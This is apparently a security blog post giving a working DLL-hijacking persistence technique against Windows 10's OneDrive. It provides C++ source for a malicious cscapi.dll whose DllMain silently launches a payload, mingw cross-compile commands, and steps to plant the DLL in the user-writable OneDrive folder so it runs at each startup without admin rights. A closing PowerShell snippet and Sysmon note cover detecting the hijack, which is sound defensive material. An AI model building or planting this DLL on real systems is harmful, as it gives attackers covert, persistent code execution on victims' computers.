
DLL Hijacking - Persistence Method

 ·  ☕ 1 min read  ·  🐱 thik

CPP - Execute Command Prompt

Copy the code below and change the path of the Payload (the executable launched from exec1, here C:\programdata\putty.exe) to wherever you have placed it.

#include <windows.h>

// exec1: launch the real payload. The path is the one to change (see above).
// uCmdShow = SW_HIDE (0) hides the cmd.exe window; the payload itself may still show one.
void exec1() {
	WinExec("cmd.exe /c C:\\programdata\\putty.exe", SW_HIDE);
}

// exec2: launch a second, visible program so you can see the DLL was loaded.
void exec2() {
	WinExec("cmd.exe /c calc.exe", SW_HIDE);
}

// DllMain runs as soon as the hijacked host (here OneDrive.exe) loads this DLL.
// Note: DllMain executes under the loader lock, so a long Sleep here is fine for a
// demonstration but should be avoided in anything that has to stay stable.
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
	switch (dwReason)
	{
		case DLL_PROCESS_ATTACH:
			exec1();
			Sleep(5000); // wait 5 seconds between the two payloads
			exec2();
			break;
	}
	return TRUE;
}

αž™αŸ„αž„αžαžΆαž˜αŸ– dllmain

DLL Build

Open a Terminal on your Linux machine and run the following commands:

# To create Windows executables you need to install the mingw-w64 cross-compiler
sudo apt-get install mingw-w64

# For x64, compile with:
x86_64-w64-mingw32-g++ r4t.cpp -shared -o output.dll

# For x86, compile with:
i686-w64-mingw32-g++ r4t.cpp -shared -o output.dll

# Build for the same architecture as the OneDrive.exe on the target: a process cannot load a DLL of the other bitness.

Get Persistence In Windows 10

Rename the Payload you just built to cscapi.dll, then copy that malicious file into the OneDrive program folder, which is located at the following path:

C:\Users\[username]\AppData\Local\Microsoft\OneDrive\

cscapi.dll

This method gives Persistence by abusing a DLL that onedrive.exe depends on: every time the OneDrive program that ships with Windows is launched at Start Up, it loads cscapi.dll from its own folder and so runs the malicious file directly. It works because Windows searches the application's own directory before System32 for a DLL loaded by name (unless the DLL is a KnownDLL or is loaded by full path), and because the per-user OneDrive install under AppData\Local is writable by the user, so no administrator rights are needed to plant the file.

The two commands below kill the running Process and relaunch the program, in case you want to test the method above immediately without having to Restart the computer.

:: To kill the OneDrive process
taskkill /im onedrive.exe /f

:: Run the program again (from the OneDrive folder given above)
cmd.exe /c onedrive.exe
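To confirm the hijack took, or to spot it from the defender's side, the following PowerShell snippet (added here; it is not part of the original post) lists which cscapi.dll each running OneDrive.exe has loaded and checks its Authenticode signature. It assumes the per-user OneDrive folder given above; the planted DLL shows up as unsigned, while the legitimate copy from System32 carries a valid Microsoft signature.

```powershell
# Added example (not from the original post): check which cscapi.dll OneDrive.exe loaded.
# Assumes the per-user OneDrive folder from the post: %LOCALAPPDATA%\Microsoft\OneDrive
$planted = Join-Path $env:LOCALAPPDATA 'Microsoft\OneDrive\cscapi.dll'

$procs = Get-Process -Name OneDrive -ErrorAction SilentlyContinue
if (-not $procs) {
    Write-Warning 'OneDrive.exe is not running; start it first (cmd.exe /c onedrive.exe).'
    return
}

foreach ($p in $procs) {
    # Process.Modules enumerates the DLLs mapped into the process. If the list comes
    # back empty, run this from a PowerShell of the same bitness as OneDrive.exe.
    $mod = $p.Modules | Where-Object { $_.ModuleName -ieq 'cscapi.dll' }
    if (-not $mod) {
        "PID $($p.Id): cscapi.dll is not loaded in this process"
        continue
    }
    $sig = Get-AuthenticodeSignature -FilePath $mod.FileName
    [pscustomobject]@{
        PID       = $p.Id
        Loaded    = $mod.FileName
        Signature = $sig.Status   # 'NotSigned' for the planted DLL, 'Valid' for Microsoft's copy
        Hijacked  = ($mod.FileName -ieq $planted)
    }
}
```

The same evidence is what a detection would key on: an ImageLoad event (Sysmon Event ID 7) showing OneDrive.exe loading an unsigned cscapi.dll from under AppData\Local instead of System32.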

Reference: ippsec
See also: ain-kun.medium

Written by thik, Security Researcher